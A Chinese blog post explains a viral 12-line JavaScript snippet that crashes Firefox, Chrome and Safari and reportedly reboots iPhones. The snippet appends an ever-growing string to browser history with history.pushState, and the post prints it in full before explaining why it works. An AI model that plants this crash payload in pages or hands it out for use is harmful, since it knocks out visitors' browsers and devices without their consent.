让你电脑崩溃手机重启 只需12行JS代码

作者:Tavis 分类: 代码笔记 时间:2016-1-26 16:04 ė8069次浏览 0 技巧

最近,一段神秘的12行代码在国外社交网络上火了起来,据说能让你的浏览器瞬间崩溃,iPhone秒重启。到底是什么代码这么神奇?

上周,国外网友Cyber Security@cyber__sec在Twitter上发布了这样一段推文

1.jpg

使用下面这段javascript代码,能让Firefox、Chrome、Safari浏览器崩溃,还能让iPhone重启”。

<html>

<body>

<script>

var total="";

for (var i=0;i<1000000;i++)

{
total= total+i.toString ();

history.pushState (0,0,total);

}

</script>

</body>

</html>


果是PC用户,内存使用率一路狂飙,浏览器会瞬间卡死;如果是手机用户,点开链接浏览器会闪退,而微博、微信内打开链接同样会闪退。如果是iPhone用户使用Safari打开之后链接,手机重启。

history.pushstate()是HTML5引入的API,pushState将指定的URL添加到浏览器历史里,存储当前历史记录点。 当 i<100000 的时候会循环的将 total记录到浏览器历史里面,重复多了,浏览器就承受不住了,自然就崩了。

 

除特别注明,本博文章均出自 Tavis' Blog,转载时请注明出处及相应链接。

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部